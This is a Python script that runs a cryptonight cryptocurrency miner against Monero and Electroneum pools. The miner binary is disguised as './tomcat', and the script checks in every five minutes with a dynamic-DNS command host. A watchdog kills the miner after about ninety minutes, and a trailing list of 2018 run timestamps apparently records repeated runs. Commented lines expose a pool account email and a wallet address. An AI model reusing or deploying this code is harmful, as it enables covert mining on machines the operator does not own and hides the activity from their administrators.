import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:58:03.979124
#2018-02-17 16:46:04.303277
#2018-02-17 18:35:08.864329
#2018-02-17 20:23:07.166750
#2018-02-17 22:10:07.237839
#2018-02-17 23:54:06.200427
#2018-02-18 01:43:06.464572
#2018-02-18 03:31:04.907360
#2018-02-18 05:18:03.557366
#2018-02-18 07:10:01.971590
#2018-02-18 08:58:01.978389
#2018-02-18 10:45:04.476165
#2018-02-18 12:28:07.226356
#2018-02-18 14:16:06.752098
#2018-02-18 16:07:04.187890
#2018-02-18 17:56:01.301838
#2018-02-18 19:42:07.194819
#2018-02-18 21:27:07.035837
#2018-02-18 23:16:06.585816
#2018-02-19 01:02:05.317127
#2018-02-19 02:49:01.979688
#2018-02-19 04:36:04.009994
#2018-02-19 06:20:09.271307
#2018-02-19 08:08:06.306844
#2018-02-19 09:58:06.988974
#2018-02-19 11:48:09.429174
#2018-02-19 13:33:02.225028
#2018-02-19 15:21:02.211458
#2018-02-19 17:08:09.688628
#2018-02-19 18:56:05.945551
#2018-02-19 20:43:05.966477
#2018-02-19 22:32:02.120134
#2018-02-20 00:17:05.609420
#2018-02-20 02:05:06.355526
#2018-02-20 03:56:01.278710
#2018-02-20 05:39:07.693340
#2018-02-20 07:26:01.757968
#2018-02-20 09:10:08.365259
#2018-02-20 10:53:06.658882
#2018-02-20 12:39:06.329935
#2018-02-20 14:25:04.504868
#2018-02-20 16:09:07.384934
#2018-02-20 17:53:10.253111
#2018-02-20 19:45:04.299111
#2018-02-20 21:33:05.794872
#2018-02-20 23:17:08.007019
#2018-02-21 01:01:05.228240
#2018-02-21 02:48:04.274584
#2018-02-21 04:32:05.444905
#2018-02-21 06:18:07.770272
#2018-02-21 08:04:06.617698
#2018-02-21 09:50:06.388281
#2018-02-21 11:38:01.885173
#2018-02-21 13:28:09.020354
#2018-02-21 15:13:01.643829
#2018-02-21 17:06:01.485932
#2018-02-21 18:52:08.302808
#2018-02-21 20:41:06.900451
#2018-02-21 22:28:04.091845
#2018-02-22 00:17:05.689268
#2018-02-22 02:04:01.968475
#2018-02-22 03:50:03.456805
#2018-02-22 05:37:05.247732
#2018-02-22 07:23:07.677735
#2018-02-22 09:11:07.313119
#2018-02-22 11:00:05.034731
#2018-02-22 12:47:04.387064
#2018-02-22 14:34:01.435022
#2018-02-22 16:20:10.515431
#2018-02-22 18:08:05.087775
#2018-02-22 19:57:08.885566
#2018-02-22 21:46:12.024953
#2018-02-22 23:34:06.792506
#2018-02-23 01:22:01.678221
#2018-02-23 03:08:04.988075
#2018-02-23 04:54:06.446859
#2018-02-23 06:40:03.932924
#2018-02-23 08:29:04.855335
#2018-02-23 10:44:01.968730
#2018-02-23 12:42:06.570434
#2018-02-23 14:28:05.203344
#2018-02-23 16:18:12.290051
#2018-02-23 18:04:09.689549
#2018-02-23 19:49:05.899730
#2018-02-23 21:33:01.740478
#2018-02-23 23:20:05.289265
#2018-02-24 01:09:01.633854
#2018-02-24 03:01:05.447287
#2018-02-24 04:48:01.362165
#2018-02-24 06:28:06.557534
#2018-02-24 08:17:03.830912
#2018-02-24 10:02:02.185912
#2018-02-24 12:00:10.028539
#2018-02-24 13:49:01.430786
#2018-02-24 15:42:03.602481
#2018-02-24 17:35:05.150066
#2018-02-24 19:21:04.365558
#2018-02-24 21:12:05.448776
#2018-02-24 23:45:09.200715
#2018-02-25 03:06:04.638753
#2018-02-25 07:03:06.220003